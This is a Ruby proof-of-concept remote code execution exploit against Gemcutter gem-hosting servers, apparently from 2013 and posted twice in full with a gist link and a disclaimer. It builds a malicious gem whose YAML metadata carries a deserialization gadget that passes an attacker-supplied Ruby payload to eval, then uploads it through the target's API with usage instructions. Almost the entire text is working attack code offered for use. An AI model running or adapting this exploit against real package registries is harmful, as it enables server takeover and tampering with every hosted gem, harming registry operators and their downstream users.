#!/usr/bin/env ruby
#
# Proof-of-Concept RCE exploit against Gemcutter
#
# ## Advisory
#
# * TBA
#
# ## Caveats
#
# * rubygems.org has disabled gem uploads until the vulnerability is fixed.
# However, other Gemcutter instances are vulnerable.
#
# ## Synopsis
#
# $ gemcutter_rce.rb BASE_URL API_KEY RUBY
#
# ## Dependencies
#
# $ gem install ronin-support
#
# ## Example
#
# $ gemcutter_rce.rb https://host.com $API_KEY "sleep 4"
#
# ## License
#
# Copyright (c) 2013 Postmodern
#
# This exploit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This exploit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this exploit. If not, see <http://www.gnu.org/licenses/>.
#
# ## Shoutz
#
# drraid, cd, px, sanitybit, sysfail, trent, dbcooper, goldy, coderman, letch,
# starik, toby, jlt, HockeyInJune, cloud, zek, natron, amesc, postmodern,
# mephux, nullthreat, evoltech, flatline, r0bglesson, lianj, @bascule,
# @charliesome, @homakov, @envygeek, @blambeau
# (for originally reporting the vuln one whole week ago),
# @dtao (for safe_yaml), @qrush, @evanphx, YAML, Kreayshawn, Lil Debbie, Boxxy,
# Randy Savage, "rockin' the wolf on your noggin", SophSec crew and affiliates.
#
require 'ronin/network/http'
require 'ronin/ui/output'
require 'yaml'
include Ronin::Network::HTTP
include Ronin::UI::Output::Helpers
def exploit(base_url,api_key,payload)
spec = Gem::Specification.new do |gem|
gem.name = 'acts_as_exploit'
gem.version = Array.new(3) { rand(50) }.join('.')
gem.author = 'Hacker'
gem.email = 'support@rubygems.org'
gem.homepage = 'http://rubygems.org/'
gem.files = [File.basename($0)]
gem.summary = %{PoC malicious gem that exploits YAML.load in gemcutter}
gem.description = %{
A Proof-of-Concept PoC gem that exploits a vulnerability in the Psych YAML
parser, which allows the #[]= method to be called on arbitrary Objects.
If the #[]= method later calls eval() with the given arguments, this allows for
arbitrary execution of code.
If you find this gem on your Gemcutter instance, you are vulnerable and every
gem that has been uploaded could be modified.
}.strip
class << gem
attr_accessor :payload
def to_yaml(*)
payload = "(#{@payload}; @executed = true) unless @executed"
escaped_payload = "foo\n#{payload}\n__END__\n"
encoded_payload = escaped_payload.to_yaml.sub('--- ','').chomp
super + %{exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? #{encoded_payload}
: !ruby/object:OpenStruct
table:
:defaults:
:action: create
:controller: foos
:required_parts: []
:requirements:
:action: create
:controller: foos
:segment_keys:
- :format
modifiable: true
}
end
end
gem.payload = payload
end
print_info "Building malicious gem containing #{payload} ..."
builder = Gem::Builder.new(spec)
gem = File.new(builder.build,'rb')
print_info "Uploading malicious gem to #{base_url} ..."
return http_post(
:url => "#{base_url}/api/v1/gems",
:headers => {
:content_type => 'application/octet-stream',
:content_length => gem.size,
:authorization => api_key
},
:body => gem.read
)
end
if $0 == __FILE__
unless ARGV.length == 3
$stderr.puts "usage: #{$0} BASE_URL API_KEY RUBY"
exit -1
end
base_url = ARGV[0]
api_key = ARGV[1]
payload = ARGV[2]
response = exploit(base_url,api_key,payload)
case response.code
when '200' then print_info "Success!"
else
print_error "Error #{response.code}"
print_error response.body
end
end
Source link: https://gist.github.com/4675528
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
#
# Proof-of-Concept RCE exploit against Gemcutter
#
# ## Advisory
#
# * TBA
#
# ## Caveats
#
# * rubygems.org has disabled gem uploads until the vulnerability is fixed.
# However, other Gemcutter instances are vulnerable.
#
# ## Synopsis
#
# $ gemcutter_rce.rb BASE_URL API_KEY RUBY
#
# ## Dependencies
#
# $ gem install ronin-support
#
# ## Example
#
# $ gemcutter_rce.rb https://host.com $API_KEY "sleep 4"
#
# ## License
#
# Copyright (c) 2013 Postmodern
#
# This exploit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This exploit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this exploit. If not, see <http://www.gnu.org/licenses/>.
#
# ## Shoutz
#
# drraid, cd, px, sanitybit, sysfail, trent, dbcooper, goldy, coderman, letch,
# starik, toby, jlt, HockeyInJune, cloud, zek, natron, amesc, postmodern,
# mephux, nullthreat, evoltech, flatline, r0bglesson, lianj, @bascule,
# @charliesome, @homakov, @envygeek, @blambeau
# (for originally reporting the vuln one whole week ago),
# @dtao (for safe_yaml), @qrush, @evanphx, YAML, Kreayshawn, Lil Debbie, Boxxy,
# Randy Savage, "rockin' the wolf on your noggin", SophSec crew and affiliates.
#
require 'ronin/network/http'
require 'ronin/ui/output'
require 'yaml'
include Ronin::Network::HTTP
include Ronin::UI::Output::Helpers
def exploit(base_url,api_key,payload)
spec = Gem::Specification.new do |gem|
gem.name = 'acts_as_exploit'
gem.version = Array.new(3) { rand(50) }.join('.')
gem.author = 'Hacker'
gem.email = 'support@rubygems.org'
gem.homepage = 'http://rubygems.org/'
gem.files = [File.basename($0)]
gem.summary = %{PoC malicious gem that exploits YAML.load in gemcutter}
gem.description = %{
A Proof-of-Concept PoC gem that exploits a vulnerability in the Psych YAML
parser, which allows the #[]= method to be called on arbitrary Objects.
If the #[]= method later calls eval() with the given arguments, this allows for
arbitrary execution of code.
If you find this gem on your Gemcutter instance, you are vulnerable and every
gem that has been uploaded could be modified.
}.strip
class << gem
attr_accessor :payload
def to_yaml(*)
payload = "(#{@payload}; @executed = true) unless @executed"
escaped_payload = "foo\n#{payload}\n__END__\n"
encoded_payload = escaped_payload.to_yaml.sub('--- ','').chomp
super + %{exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? #{encoded_payload}
: !ruby/object:OpenStruct
table:
:defaults:
:action: create
:controller: foos
:required_parts: []
:requirements:
:action: create
:controller: foos
:segment_keys:
- :format
modifiable: true
}
end
end
gem.payload = payload
end
print_info "Building malicious gem containing #{payload} ..."
builder = Gem::Builder.new(spec)
gem = File.new(builder.build,'rb')
print_info "Uploading malicious gem to #{base_url} ..."
return http_post(
:url => "#{base_url}/api/v1/gems",
:headers => {
:content_type => 'application/octet-stream',
:content_length => gem.size,
:authorization => api_key
},
:body => gem.read
)
end
if $0 == __FILE__
unless ARGV.length == 3
$stderr.puts "usage: #{$0} BASE_URL API_KEY RUBY"
exit -1
end
base_url = ARGV[0]
api_key = ARGV[1]
payload = ARGV[2]
response = exploit(base_url,api_key,payload)
case response.code
when '200' then print_info "Success!"
else
print_error "Error #{response.code}"
print_error response.body
end
end
Source link: https://gist.github.com/4675528
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information